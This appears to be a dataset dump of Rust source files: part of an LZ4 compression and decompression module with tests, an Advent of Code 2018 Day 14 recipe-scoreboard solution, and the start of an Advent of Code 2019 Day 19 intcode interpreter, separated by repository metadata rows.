                    // Multiplicative (Knuth-style) hash of the 4-byte sequence.
                    let hash = (Wrapping(seq) * Wrapping(2654435761)).shr(HASH_SHIFT as usize).0;
                    let mut r = (Wrapping(self.hash_table[hash as usize]) + Wrapping(UNINITHASH)).0;
                    self.hash_table[hash as usize] = (Wrapping(self.pos) - Wrapping(UNINITHASH)).0;

                    // No usable match (offset too far or bytes differ): skip
                    // ahead, accelerating through incompressible regions.
                    if (Wrapping(self.pos) - Wrapping(r)).shr(16).0 != 0 || seq != self.seq_at(r) {
                        if self.pos - self.anchor > limit {
                            limit = limit << 1;
                            step += 1 + (step >> 2);
                        }
                        self.pos += step;
                        continue;
                    }

                    // Found a match while skipping: back up and rescan at
                    // single-byte granularity.
                    if step > 1 {
                        self.hash_table[hash as usize] = r - UNINITHASH;
                        self.pos -= step - 1;
                        step = 1;
                        continue;
                    }
                    limit = INCOMPRESSIBLE;

                    let ln = self.pos - self.anchor;
                    let back = self.pos - r;

                    let anchor = self.anchor;
                    self.pos += MIN_MATCH;
                    r += MIN_MATCH;
                    self.anchor = self.pos;

                    // Extend the match forward as far as the bytes agree.
                    while (self.pos < input_len - 5) && self.input[self.pos as usize] == self.input[r as usize] {
                        self.pos += 1;
                        r += 1
                    }

                    let mut ml_len = self.pos - self.anchor;

                    // Emit pending literals, then the 16-bit match offset.
                    self.write_literals(ln, ml_len, anchor);
                    self.output[self.dest_pos as usize] = back as u8;
                    self.output[self.dest_pos as usize + 1] = (back >> 8) as u8;
                    self.dest_pos += 2;

                    // Extended match-length bytes, 255 at a time.
                    if ml_len > ML_MASK - 1 {
                        ml_len -= ML_MASK;
                        while ml_len > 254 {
                            ml_len -= 255;
                            self.output[self.dest_pos as usize] = 255;
                            self.dest_pos += 1;
                        }
                        self.output[self.dest_pos as usize] = ml_len as u8;
                        self.dest_pos += 1;
                    }

                    self.anchor = self.pos;
                }
            }
        }
    }
}
/// This structure is used to decode a stream of LZ4 blocks. This wraps an
/// internal reader which is read from when this decoder's read method is
/// called.
pub struct Decoder<R> {
    /// The internally wrapped reader. This is exposed so it may be moved out
    /// of. Note that if data is read from the reader while decoding is in
    /// progress the output stream will get corrupted.
    pub r: R,

    temp: Vec<u8>,   // scratch buffer holding the current compressed block
    output: Vec<u8>, // decompressed bytes of the current block
    start: usize,    // read position within `output`
    end: usize,      // number of valid bytes in `output`
    eof: bool,       // the final (empty) block has been seen
    header: bool,    // the frame header has been parsed
    blk_checksum: bool,    // each block is followed by a checksum
    stream_checksum: bool, // the stream ends with a checksum
    max_block_size: usize, // maximum decompressed block size from the header
}
impl<R: Read + Sized> Decoder<R> {
    /// Creates a new decoder which will read data from the given stream. The
    /// inner stream can be re-acquired by moving out of the `r` field of this
    /// structure.
    pub fn new(r: R) -> Decoder<R> {
        Decoder {
            r: r,
            temp: Vec::new(),
            output: Vec::new(),
            header: false,
            blk_checksum: false,
            stream_checksum: false,
            start: 0,
            end: 0,
            eof: false,
            max_block_size: 0,
        }
    }

    /// Resets this decoder back to its initial state. Note that the underlying
    /// stream is not seeked on or has any alterations performed on it.
    pub fn reset(&mut self) {
        self.header = false;
        self.eof = false;
        self.start = 0;
        self.end = 0;
    }

    /// Parses the LZ4 frame header: validates the magic number and version,
    /// then records the checksum flags and maximum block size.
    fn read_header(&mut self) -> io::Result<()> {
        // Make sure the magic number is what's expected.
        if try!(self.r.read_u32::<LittleEndian>()) != MAGIC {
            return Err(io::Error::new(io::ErrorKind::InvalidInput, ""))
        }

        // Read exactly the two descriptor bytes (FLG and BD). A bare `read`
        // may legally return fewer bytes than requested, which previously
        // could leave the BD byte as zero-initialized garbage.
        let mut bits = [0; 2];
        let mut nread = 0;
        while nread < bits.len() {
            match try!(self.r.read(&mut bits[nread..])) {
                0 => return Err(io::Error::new(io::ErrorKind::InvalidInput, "")),
                n => nread += n,
            }
        }
        let flg = bits[0];
        let bd = bits[1];

        // bits 7/6, the version number. Right now this must be 1
        if (flg >> 6) != 0b01 {
            return Err(io::Error::new(io::ErrorKind::InvalidInput, ""))
        }
        // bit 5 is the "block independence", don't care about this yet
        // bit 4 is whether blocks have checksums or not
        self.blk_checksum = (flg & 0x10) != 0;
        // bit 3 is whether there is a following stream size
        let stream_size = (flg & 0x08) != 0;
        // bit 2 is whether there is a stream checksum
        self.stream_checksum = (flg & 0x04) != 0;
        // bit 1 is reserved
        // bit 0 is whether there is a preset dictionary
        let preset_dictionary = (flg & 0x01) != 0;

        static MAX_SIZES: [usize; 8] =
            [0, 0, 0, 0, // all N/A
             64 << 10,   // 64KB
             256 << 10,  // 256 KB
             1 << 20,    // 1MB
             4 << 20];   // 4MB

        // bit 7 is reserved
        // bits 6-4 are the maximum block size
        let max_block_size = MAX_SIZES[(bd >> 4) as usize & 0x7];
        // bits 3-0 are reserved

        // read off other portions of the stream
        let size = if stream_size {
            Some(try!(self.r.read_u64::<LittleEndian>()))
        } else {
            None
        };
        assert!(!preset_dictionary, "preset dictionaries not supported yet");

        debug!("blk: {}", self.blk_checksum);
        debug!("stream: {}", self.stream_checksum);
        debug!("max size: {}", max_block_size);
        debug!("stream size: {:?}", size);

        self.max_block_size = max_block_size;

        // XXX: implement checksums
        let cksum = try!(self.r.read_u8());
        debug!("ignoring header checksum: {}", cksum);
        return Ok(());
    }

    /// Reads and decodes one block into `output`; returns `Ok(false)` on the
    /// end-of-stream marker (a zero length word).
    fn decode_block(&mut self) -> io::Result<bool> {
        match try!(self.r.read_u32::<LittleEndian>()) {
            // final block, we're done here
            0 => return Ok(false),

            // raw block to read (high bit set: stored uncompressed)
            n if n & 0x80000000 != 0 => {
                let amt = (n & 0x7fffffff) as usize;
                self.output.truncate(0);
                self.output.reserve(amt);
                try!(self.r.push_exactly(amt as u64, &mut self.output));
                self.start = 0;
                self.end = amt;
            }

            // actual block to decompress
            n => {
                let n = n as usize;
                self.temp.truncate(0);
                self.temp.reserve(n);
                try!(self.r.push_exactly(n as u64, &mut self.temp));

                // Heuristic initial capacity; the block decoder grows the
                // buffer further when needed.
                let target = cmp::min(self.max_block_size, 4 * n / 3);
                self.output.truncate(0);
                self.output.reserve(target);

                let mut decoder = BlockDecoder {
                    input: &self.temp[..n],
                    output: &mut self.output,
                    cur: 0,
                    start: 0,
                    end: 0,
                };
                self.start = 0;
                self.end = decoder.decode();
            }
        }

        if self.blk_checksum {
            let cksum = try!(self.r.read_u32::<LittleEndian>());
            debug!("ignoring block checksum {}", cksum);
        }
        return Ok(true);
    }

    /// Tests whether the end of this LZ4 stream has been reached
    pub fn eof(&mut self) -> bool { self.eof }
}
impl<R: Read> Read for Decoder<R> {
    /// Decompresses into `dst`, decoding further blocks from the underlying
    /// reader as needed; returns the number of decompressed bytes written.
    fn read(&mut self, dst: &mut [u8]) -> io::Result<usize> {
        if self.eof { return Ok(0) }
        if !self.header {
            try!(self.read_header());
            self.header = true;
        }
        let mut amt = dst.len();
        let len = amt;
        while amt > 0 {
            // Buffered block exhausted: decode the next one.
            if self.start == self.end {
                let keep_going = try!(self.decode_block());
                if !keep_going {
                    self.eof = true;
                    break;
                }
            }
            let n = cmp::min(amt, self.end - self.start);
            // SAFETY(review): `start + n <= end <= output.len()` and
            // `len - amt + n <= dst.len()`, so both ranges are in bounds and
            // the two buffers never alias.
            unsafe { copy_nonoverlapping(
                &self.output[self.start],
                &mut dst[len - amt],
                n
            )};
            self.start += n;
            amt -= n;
        }

        Ok(len - amt)
    }
}
/// This structure is used to compress a stream of bytes using the LZ4
/// compression algorithm. This is a wrapper around an internal writer which
/// bytes will be written to.
pub struct Encoder<W> {
    w: W,               // the wrapped output sink
    buf: Vec<u8>,       // uncompressed bytes pending in the current block
    tmp: Vec<u8>,       // scratch buffer for a compressed block
    wrote_header: bool, // whether the frame header has been emitted
    limit: usize,       // block size at which `buf` is flushed
}
impl<W: Write> Encoder<W> {
    /// Creates a new encoder which will have its output written to the given
    /// output stream. The output stream can be re-acquired by calling
    /// `finish()`
    ///
    /// NOTE: compression isn't actually implemented just yet, this is just a
    /// skeleton of a future implementation.
    pub fn new(w: W) -> Encoder<W> {
        Encoder {
            w: w,
            wrote_header: false,
            buf: Vec::with_capacity(1024),
            tmp: Vec::new(),
            limit: 256 * 1024,
        }
    }

    /// Emits the pending block: compressed when `compress()` succeeds, or raw
    /// with the high bit of the length word set.
    fn encode_block(&mut self) -> io::Result<()> {
        self.tmp.truncate(0);
        if self.compress() {
            try!(self.w.write_u32::<LittleEndian>(self.tmp.len() as u32));
            // write_all: a bare `write` may consume only part of the buffer,
            // silently corrupting the output stream.
            try!(self.w.write_all(&self.tmp));
        } else {
            try!(self.w.write_u32::<LittleEndian>((self.buf.len() as u32) | 0x80000000));
            try!(self.w.write_all(&self.buf));
        }
        self.buf.truncate(0);
        Ok(())
    }

    /// Attempts to compress `buf` into `tmp`; returns false so the block is
    /// emitted uncompressed (compression is not implemented yet).
    fn compress(&mut self) -> bool {
        false
    }

    /// This function is used to flag that this session of compression is done
    /// with. The stream is finished up (final bytes are written), and then the
    /// wrapped writer is returned.
    pub fn finish(mut self) -> (W, io::Result<()>) {
        let mut result = self.flush();
        // Terminate the frame with two zero words; any earlier error is
        // preserved while still attempting the writes.
        for _ in 0..2 {
            let tmp = self.w.write_u32::<LittleEndian>(0)
                .map_err(byteorder_err_to_io);
            result = result.and_then(|_| tmp);
        }
        (self.w, result)
    }
}
impl<W: Write> Write for Encoder<W> {
    /// Buffers `buf`, emitting the frame header on first use and flushing a
    /// block whenever the buffer reaches `limit` bytes.
    ///
    /// Returns the number of input bytes consumed (always all of them).
    fn write(&mut self, mut buf: &[u8]) -> io::Result<usize> {
        if !self.wrote_header {
            try!(self.w.write_u32::<LittleEndian>(MAGIC));
            // version 01, turn on block independence, but turn off
            // everything else (we have no checksums right now).
            try!(self.w.write_u8(0b01_100000));
            // Maximum block size is 256KB
            try!(self.w.write_u8(0b0_101_0000));
            // XXX: this checksum is just plain wrong.
            try!(self.w.write_u8(0));
            self.wrote_header = true;
        }

        // Remember the original length up front: `buf` is narrowed to an
        // empty slice by the loop below, so returning `buf.len()` afterwards
        // would always report 0 bytes consumed — breaking the Write contract
        // (e.g. `write_all` on top of this would spin or error).
        let total = buf.len();
        while buf.len() > 0 {
            let amt = cmp::min(self.limit - self.buf.len(), buf.len());
            self.buf.extend_from_slice(&buf[..amt]);
            if self.buf.len() == self.limit {
                try!(self.encode_block());
            }
            buf = &buf[amt..];
        }
        Ok(total)
    }

    /// Encodes any buffered bytes as a final partial block, then flushes the
    /// inner writer.
    fn flush(&mut self) -> io::Result<()> {
        if self.buf.len() > 0 {
            try!(self.encode_block());
        }
        self.w.flush()
    }
}
/// Decodes a pure (headerless) LZ4 block into `output`, returning the number
/// of decompressed bytes produced.
pub fn decode_block(input: &[u8], output: &mut Vec<u8>) -> usize {
    BlockDecoder {
        input: input,
        output: output,
        cur: 0,
        start: 0,
        end: 0,
    }
    .decode()
}
/// Encodes `input` into a pure (headerless) LZ4 block, returning the number
/// of compressed bytes written to `output`.
pub fn encode_block(input: &[u8], output: &mut Vec<u8>) -> usize {
    // One zeroed slot per possible 4-byte-sequence hash.
    let hash_table: Vec<u32> = repeat(0).take(HASH_TABLE_SIZE as usize).collect();
    let mut encoder = BlockEncoder {
        input: input,
        output: output,
        hash_table: hash_table,
        pos: 0,
        anchor: 0,
        dest_pos: 0,
    };
    encoder.encode() as usize
}
#[cfg(test)]
mod test {
    use std::io::{BufReader, BufWriter, Read, Write};
    use super::super::rand;
    use super::{Decoder, Encoder};
    #[cfg(feature="unstable")]
    use test;
    use super::super::byteorder::ReadBytesExt;

    // Decompresses `input` and asserts it equals the reference `output`.
    fn test_decode(input: &[u8], output: &[u8]) {
        let mut d = Decoder::new(BufReader::new(input));

        let mut buf = Vec::new();
        d.read_to_end(&mut buf).unwrap();
        assert!(&buf[..] == output);
    }

    // Reference streams produced at lz4 compression levels 1 through 9.
    #[test]
    fn decode() {
        let reference = include_bytes!("data/test.txt");
        test_decode(include_bytes!("data/test.lz4.1"), reference);
        test_decode(include_bytes!("data/test.lz4.2"), reference);
        test_decode(include_bytes!("data/test.lz4.3"), reference);
        test_decode(include_bytes!("data/test.lz4.4"), reference);
        test_decode(include_bytes!("data/test.lz4.5"), reference);
        test_decode(include_bytes!("data/test.lz4.6"), reference);
        test_decode(include_bytes!("data/test.lz4.7"), reference);
        test_decode(include_bytes!("data/test.lz4.8"), reference);
        test_decode(include_bytes!("data/test.lz4.9"), reference);
    }

    // Block-level (headerless) round trip through encode_block/decode_block.
    #[test]
    fn raw_encode_block() {
        let data = include_bytes!("data/test.txt");
        let mut encoded = Vec::new();
        super::encode_block(data, &mut encoded);

        let mut decoded = Vec::new();
        super::decode_block(&encoded[..], &mut decoded);

        assert_eq!(&data[..], &decoded[..]);
    }

    // Exercises the buffered-copy path with the smallest possible reads.
    #[test]
    fn one_byte_at_a_time() {
        let input = include_bytes!("data/test.lz4.1");
        let mut d = Decoder::new(BufReader::new(&input[..]));
        assert!(!d.eof());
        let mut out = Vec::new();
        loop {
            match d.read_u8() {
                Ok(b) => out.push(b),
                Err(..) => break
            }
        }
        assert!(d.eof());
        assert!(&out[..] == &include_bytes!("data/test.txt")[..]);
    }

    // Exercises the copy loop with read sizes that straddle block boundaries.
    #[test]
    fn random_byte_lengths() {
        let input = include_bytes!("data/test.lz4.1");
        let mut d = Decoder::new(BufReader::new(&input[..]));
        let mut out = Vec::new();
        let mut buf = [0u8; 40];
        loop {
            match d.read(&mut buf[..(1 + rand::random::<usize>() % 40)]) {
                Ok(0) => break,
                Ok(n) => {
                    out.extend(buf[..n].iter().map(|b| *b));
                }
                Err(..) => break
            }
        }
        assert!(&out[..] == &include_bytes!("data/test.txt")[..]);
    }

    // Full frame round trip: Encoder -> bytes -> Decoder.
    fn roundtrip(bytes: &[u8]) {
        let mut e = Encoder::new(BufWriter::new(Vec::new()));
        e.write(bytes).unwrap();
        let (e, err) = e.finish();
        err.unwrap();
        let encoded = e.into_inner().unwrap();

        let mut d = Decoder::new(BufReader::new(&encoded[..]));
        let mut decoded = Vec::new();
        d.read_to_end(&mut decoded).unwrap();
        assert_eq!(&decoded[..], bytes);
    }

    #[test]
    fn some_roundtrips() {
        roundtrip(b"test");
        roundtrip(b"");
        roundtrip(include_bytes!("data/test.txt"));
    }

    #[cfg(feature="unstable")]
    #[bench]
    fn decompress_speed(bh: &mut test::Bencher) {
        let input = include_bytes!("data/test.lz4.9");
        let mut d = Decoder::new(BufReader::new(&input[..]));
        let mut output = [0u8; 65536];
        let mut output_size = 0;
        bh.iter(|| {
            d.r = BufReader::new(&input[..]);
            d.reset();
            output_size = d.read(&mut output).unwrap();
        });
        bh.bytes = output_size as u64;
    }
}
| true |
ef369331e0d02abe6eaaa191a347122e35fb2533
|
Rust
|
haraldmaida/advent-of-code-2018
|
/src/day14/mod.rs
|
UTF-8
| 8,789 | 3.875 | 4 |
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
//! # Day 14: Chocolate Charts
//!
//! You finally have a chance to look at all of the produce moving around.
//! Chocolate, cinnamon, mint, chili peppers, nutmeg, vanilla... the Elves must
//! be growing these plants to make hot chocolate! As you realize this, you hear
//! a conversation in the distance. When you go to investigate, you discover two
//! Elves in what appears to be a makeshift underground kitchen/laboratory.
//!
//! The Elves are trying to come up with the ultimate hot chocolate recipe;
//! they're even maintaining a scoreboard which tracks the quality score (0-9)
//! of each recipe.
//!
//! Only two recipes are on the board: the first recipe got a score of 3, the
//! second, 7. Each of the two Elves has a current recipe: the first Elf starts
//! with the first recipe, and the second Elf starts with the second recipe.
//!
//! To create new recipes, the two Elves combine their current recipes. This
//! creates new recipes from the digits of the sum of the current recipes'
//! scores. With the current recipes' scores of 3 and 7, their sum is 10, and so
//! two new recipes would be created: the first with score 1 and the second with
//! score 0. If the current recipes' scores were 2 and 3, the sum, 5, would only
//! create one recipe (with a score of 5) with its single digit.
//!
//! The new recipes are added to the end of the scoreboard in the order they are
//! created. So, after the first round, the scoreboard is 3, 7, 1, 0.
//!
//! After all new recipes are added to the scoreboard, each Elf picks a new
//! current recipe. To do this, the Elf steps forward through the scoreboard a
//! number of recipes equal to 1 plus the score of their current recipe. So,
//! after the first round, the first Elf moves forward 1 + 3 = 4 times, while
//! the second Elf moves forward 1 + 7 = 8 times. If they run out of recipes,
//! they loop back around to the beginning. After the first round, both Elves
//! happen to loop around until they land on the same recipe that they had in
//! the beginning; in general, they will move to different recipes.
//!
//! Drawing the first Elf as parentheses and the second Elf as square brackets,
//! they continue this process:
//!
//! ```text
//! (3)[7]
//! (3)[7] 1 0
//! 3 7 1 [0](1) 0
//! 3 7 1 0 [1] 0 (1)
//! (3) 7 1 0 1 0 [1] 2
//! 3 7 1 0 (1) 0 1 2 [4]
//! 3 7 1 [0] 1 0 (1) 2 4 5
//! 3 7 1 0 [1] 0 1 2 (4) 5 1
//! 3 (7) 1 0 1 0 [1] 2 4 5 1 5
//! 3 7 1 0 1 0 1 2 [4](5) 1 5 8
//! 3 (7) 1 0 1 0 1 2 4 5 1 5 8 [9]
//! 3 7 1 0 1 0 1 [2] 4 (5) 1 5 8 9 1 6
//! 3 7 1 0 1 0 1 2 4 5 [1] 5 8 9 1 (6) 7
//! 3 7 1 0 (1) 0 1 2 4 5 1 5 [8] 9 1 6 7 7
//! 3 7 [1] 0 1 0 (1) 2 4 5 1 5 8 9 1 6 7 7 9
//! 3 7 1 0 [1] 0 1 2 (4) 5 1 5 8 9 1 6 7 7 9 2
//! ```
//!
//! The Elves think their skill will improve after making a few recipes (your
//! puzzle input). However, that could take ages; you can speed this up
//! considerably by identifying the scores of the ten recipes after that. For
//! example:
//!
//! * If the Elves think their skill will improve after making 9 recipes, the
//! scores of the ten recipes after the first nine on the scoreboard would be
//! 5158916779 (highlighted in the last line of the diagram).
//! * After 5 recipes, the scores of the next ten would be 0124515891.
//! * After 18 recipes, the scores of the next ten would be 9251071085.
//! * After 2018 recipes, the scores of the next ten would be 5941429882.
//!
//! What are the scores of the ten recipes immediately after the number of
//! recipes in your puzzle input?
//!
//! ## Part 2
//!
//! As it turns out, you got the Elves' plan backwards. They actually want to
//! know how many recipes appear on the scoreboard to the left of the first
//! recipes whose scores are the digits from your puzzle input.
//!
//! * 51589 first appears after 9 recipes.
//! * 01245 first appears after 5 recipes.
//! * 92510 first appears after 18 recipes.
//! * 59414 first appears after 2018 recipes.
//!
//! How many recipes appear on the scoreboard to the left of the score sequence
//! in your puzzle input?
//!
//! [Advent of Code 2018 - Day 14](https://adventofcode.com/2018/day/14)
use std::{
fmt::{self, Display},
iter::FromIterator,
str::FromStr,
};
/// A short sequence of single-digit (0-9) recipe scores.
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct ScoreSeq(Vec<u8>);
impl Display for ScoreSeq {
    /// Formats the scores as `[d, d, d]`.
    ///
    /// The previous push/pop implementation rendered an empty sequence as
    /// `"]"`; joining renders it correctly as `"[]"`. Non-empty output is
    /// unchanged (each score is a 0-9 digit, so `to_string` matches the old
    /// `char::from(score + 0x30)`).
    fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
        let digits: Vec<String> = self.0.iter().map(|score| score.to_string()).collect();
        write!(f, "[{}]", digits.join(", "))
    }
}
impl From<&[u8]> for ScoreSeq {
    /// Copies a slice of digit scores into an owned sequence.
    fn from(value: &[u8]) -> Self {
        ScoreSeq(value.to_vec())
    }
}
impl AsRef<[u8]> for ScoreSeq {
    /// Borrows the underlying digit slice.
    fn as_ref(&self) -> &[u8] {
        &self.0
    }
}
impl FromIterator<u8> for ScoreSeq {
    /// Collects digit scores into a sequence.
    fn from_iter<T: IntoIterator<Item = u8>>(iter: T) -> Self {
        ScoreSeq(iter.into_iter().collect())
    }
}
impl FromStr for ScoreSeq {
type Err = String;
fn from_str(s: &str) -> Result<Self, Self::Err> {
let mut digits = Vec::with_capacity(s.len());
for chr in s.chars() {
let digit = chr
.to_digit(10)
.ok_or_else(|| format!("not a number: {}", s))?;
digits.push(digit as u8);
}
Ok(ScoreSeq(digits))
}
}
/// The full list of recipe scores produced so far.
#[derive(Debug, Clone, PartialEq)]
pub struct Scoreboard(Vec<u8>);
impl Display for Scoreboard {
    /// Renders the scores as digits separated by two spaces.
    ///
    /// NOTE(review): the two-space separator differs from `ScoreSeq`'s
    /// `", "` — looks intentional (matches the puzzle diagram spacing) but
    /// confirm. An empty board renders as the empty string.
    fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
        let mut formatted = String::with_capacity(self.0.len() * 3);
        for score in &self.0 {
            // `score` is `&u8`; `&u8 + u8` is defined. 0x30 is ASCII '0'.
            formatted.push(char::from(score + 0x30));
            formatted.push(' ');
            formatted.push(' ');
        }
        // Strip the trailing separator.
        formatted.pop();
        formatted.pop();
        f.write_str(&formatted)
    }
}
impl FromIterator<u8> for Scoreboard {
    /// Collects digit scores into a scoreboard.
    fn from_iter<T: IntoIterator<Item = u8>>(iter: T) -> Self {
        Scoreboard(Vec::from_iter(iter.into_iter()))
    }
}
impl Scoreboard {
    /// Builds a scoreboard from any iterator of digit scores.
    pub fn new(scores: impl IntoIterator<Item = u8>) -> Self {
        Scoreboard(Vec::from_iter(scores.into_iter()))
    }

    /// Returns the `num_scores` scores immediately following the first
    /// `num_recipes` recipes.
    ///
    /// Panics if the board holds fewer than `num_recipes + num_scores`
    /// entries (the slice indexing here is unchecked).
    pub fn score_seq(&self, num_recipes: usize, num_scores: usize) -> ScoreSeq {
        ScoreSeq::from(&self.0[num_recipes..num_recipes + num_scores])
    }
}
/// Generator state for the hot-chocolate recipe scoreboard.
#[derive(Debug)]
pub struct Recipes {
    sequence: Vec<u8>, // all scores produced so far
    elf1: usize,       // index of the first elf's current recipe
    elf2: usize,       // index of the second elf's current recipe
    current: usize,    // next position in `sequence` to yield
}
impl Recipes {
    /// Starts the generator with the two initial recipes (3 and 7 in the
    /// puzzle), the elves positioned on them.
    pub fn new(recipe1: u8, recipe2: u8) -> Self {
        Recipes {
            sequence: vec![recipe1, recipe2],
            elf1: 0,
            elf2: 1,
            current: 0,
        }
    }
}
/// Infinite iterator over recipe scores; `next` never returns `None`.
///
/// (The original `impl<'a>` carried an unconstrained, entirely unused
/// lifetime parameter — removed.)
impl Iterator for Recipes {
    type Item = u8;

    fn next(&mut self) -> Option<Self::Item> {
        // Generate new recipes until the requested position exists.
        while self.current >= self.sequence.len() {
            let sum = self.sequence[self.elf1] + self.sequence[self.elf2];
            // A two-digit sum (10..=18) contributes a leading 1 first.
            if sum >= 10 {
                self.sequence.push(1);
            }
            self.sequence.push(sum % 10);
            let seq_len = self.sequence.len();
            // Each elf steps forward 1 + its current score, wrapping around.
            self.elf1 = (self.elf1 + self.sequence[self.elf1] as usize + 1) % seq_len;
            self.elf2 = (self.elf2 + self.sequence[self.elf2] as usize + 1) % seq_len;
        }
        let next = self.sequence[self.current];
        self.current += 1;
        Some(next)
    }
}
#[aoc(day14, part1)]
pub fn score_seq_after_num_recipes(input: &str) -> ScoreSeq {
let num_recipes = input
.trim()
.parse::<usize>()
.unwrap_or_else(|_| panic!("not a valid integer: {:?}", input.trim()));
let num_scores = 10;
let recipes = Recipes::new(3, 7);
let scoreboard = Scoreboard::from_iter(recipes.take(num_recipes + num_scores));
scoreboard.score_seq(num_recipes, num_scores)
}
/// Solves part 2: the number of recipes to the left of the first occurrence
/// of the input digit sequence on the scoreboard.
#[aoc(day14, part2)]
pub fn num_needed_recipes(input: &str) -> usize {
    let score_seq = ScoreSeq::from_str(input.trim())
        .unwrap_or_else(|_| panic!("not a valid integer: {:?}", input.trim()));
    let score_seq_len = score_seq.as_ref().len();
    let mut recipes = Recipes::new(3, 7);
    loop {
        let seq_len = recipes.sequence.len();
        if seq_len > score_seq_len {
            let offset = seq_len - score_seq_len;
            // Each generation step may append one OR two digits, so the
            // target may end either at the very end of the sequence or one
            // position before it — check both alignments.
            if &recipes.sequence[offset..] == score_seq.as_ref() {
                break offset;
            }
            if &recipes.sequence[offset - 1..seq_len - 1] == score_seq.as_ref() {
                break offset - 1;
            }
        }
        // Consume one recipe, which extends `sequence` as a side effect.
        recipes.next();
    }
}
#[cfg(test)]
mod tests;
| true |
33faa2170dc0c334abd4d9769c1cc8fff67c24dd
|
Rust
|
Vzaa/advent_of_code_2019
|
/day19/src/main.rs
|
UTF-8
| 8,883 | 3.140625 | 3 |
[
"Unlicense"
] |
permissive
|
use std::collections::HashMap;
use std::convert::{TryFrom, TryInto};
// Grid coordinate as (x, y).
type Pos = (i64, i64);
// Sparse map from position to tile value (0 = empty, 1 = beam).
type TileMap = HashMap<Pos, i64>;
/// Addressing mode of an intcode instruction parameter.
#[derive(Debug)]
enum Mode {
    Pos, // parameter is an absolute address
    Im,  // parameter is an immediate value
    Rel, // parameter is an offset from the relative base
}
/// A decoded intcode instruction, carrying the mode of each parameter.
#[derive(Debug)]
enum Intcode {
    Add(Mode, Mode, Mode),  // [3] = [1] + [2]
    Mult(Mode, Mode, Mode), // [3] = [1] * [2]
    In(Mode),               // [1] = next input value
    Out(Mode),              // emit [1]
    Jit(Mode, Mode),        // jump to [2] if [1] != 0
    Jif(Mode, Mode),        // jump to [2] if [1] == 0
    Lt(Mode, Mode, Mode),   // [3] = ([1] < [2]) as i64
    Equ(Mode, Mode, Mode),  // [3] = ([1] == [2]) as i64
    Adj(Mode),              // relative base += [1]
    Halt,                   // stop execution
}
/// Errors raised while decoding an opcode word.
#[derive(Debug)]
enum ErrorIntcode {
    InvalidOpcode,
    InvalidMode,
}
impl TryFrom<i64> for Mode {
    type Error = ErrorIntcode;

    /// Decodes a single parameter-mode digit (0, 1, or 2).
    fn try_from(value: i64) -> Result<Self, Self::Error> {
        let mode = match value {
            0 => Mode::Pos,
            1 => Mode::Im,
            2 => Mode::Rel,
            _ => return Err(ErrorIntcode::InvalidMode),
        };
        Ok(mode)
    }
}
impl TryFrom<i64> for Intcode {
    type Error = ErrorIntcode;

    /// Decodes an instruction word: the two low decimal digits are the
    /// opcode; the next three decimal digits are the parameter modes.
    fn try_from(value: i64) -> Result<Self, Self::Error> {
        let m1: Mode = ((value / 100) % 10).try_into()?;
        let m2: Mode = ((value / 1000) % 10).try_into()?;
        let m3: Mode = ((value / 10000) % 10).try_into()?;

        match value % 100 {
            1 => Ok(Intcode::Add(m1, m2, m3)),
            2 => Ok(Intcode::Mult(m1, m2, m3)),
            3 => Ok(Intcode::In(m1)),
            4 => Ok(Intcode::Out(m1)),
            5 => Ok(Intcode::Jit(m1, m2)),
            6 => Ok(Intcode::Jif(m1, m2)),
            7 => Ok(Intcode::Lt(m1, m2, m3)),
            8 => Ok(Intcode::Equ(m1, m2, m3)),
            9 => Ok(Intcode::Adj(m1)),
            99 => Ok(Intcode::Halt),
            _ => Err(ErrorIntcode::InvalidOpcode),
        }
    }
}
/// Loads the intcode program from the `input` file: comma-separated i64
/// values. Panics if the file is missing or malformed.
fn read_mem() -> Vec<i64> {
    std::fs::read_to_string("input")
        .unwrap()
        .trim()
        .split(',')
        .map(|s| s.parse().unwrap())
        .collect()
}
/// Reads the parameter at `addr`, resolving it through the addressing mode
/// (`rel` is the current relative base).
fn mem_get(mem: &[i64], rel: usize, addr: usize, m: Mode) -> i64 {
    let idx = match m {
        Mode::Pos => mem[addr] as usize,
        Mode::Im => addr,
        Mode::Rel => (mem[addr] + rel as i64) as usize,
    };
    mem[idx]
}
/// Writes `v` to the location named by the parameter at `addr`, resolving it
/// through the addressing mode (`rel` is the current relative base).
fn mem_set(mem: &mut [i64], rel: usize, addr: usize, m: Mode, v: i64) {
    let idx = match m {
        Mode::Pos => mem[addr] as usize,
        Mode::Im => addr,
        Mode::Rel => (mem[addr] + rel as i64) as usize,
    };
    mem[idx] = v;
}
/// An intcode machine: memory image plus program counter and relative base.
#[derive(Debug, Clone)]
struct Cpu {
    mem: Vec<i64>, // program, data, and extra zeroed scratch memory
    pc: usize,     // program counter
    rel: usize,    // relative base for `Mode::Rel` addressing
}
impl Cpu {
    /// Loads the program from the `input` file and appends scratch memory.
    fn new() -> Cpu {
        let mut mem = read_mem();
        // Ugly way to add more memory but whatevz
        mem.extend(std::iter::repeat(0).take(1024));
        Cpu { mem, pc: 0, rel: 0 }
    }

    /// Runs the machine until it produces an output (`Some(value)`), blocks
    /// on input with none available, or halts. Note that both "needs input"
    /// and "halted" return `None`; the caller distinguishes by context.
    /// `input` is consumed (via `take`) when an `In` instruction uses it.
    fn run(&mut self, input: &mut Option<i64>) -> Option<i64> {
        loop {
            let op: Intcode = self.mem[self.pc].try_into().unwrap();

            match op {
                Intcode::Add(m1, m2, m3) => {
                    let (p_a, p_b) = (
                        mem_get(&self.mem, self.rel, self.pc + 1, m1),
                        mem_get(&self.mem, self.rel, self.pc + 2, m2),
                    );
                    mem_set(&mut self.mem, self.rel, self.pc + 3, m3, p_a + p_b);
                    self.pc += 4;
                }
                Intcode::Mult(m1, m2, m3) => {
                    let (p_a, p_b) = (
                        mem_get(&self.mem, self.rel, self.pc + 1, m1),
                        mem_get(&self.mem, self.rel, self.pc + 2, m2),
                    );
                    mem_set(&mut self.mem, self.rel, self.pc + 3, m3, p_a * p_b);
                    self.pc += 4;
                }
                Intcode::In(m1) => {
                    // No input available: pause without advancing `pc`, so
                    // a later `run` call retries this instruction.
                    if input.is_none() {
                        return None;
                    }

                    mem_set(
                        &mut self.mem,
                        self.rel,
                        self.pc + 1,
                        m1,
                        input.take().expect("No input"),
                    );
                    self.pc += 2;
                }
                Intcode::Out(m1) => {
                    let p_a = mem_get(&self.mem, self.rel, self.pc + 1, m1);
                    //println!("{}", p_a);
                    self.pc += 2;
                    // Yield the output value; execution resumes on the next
                    // `run` call.
                    return Some(p_a);
                }
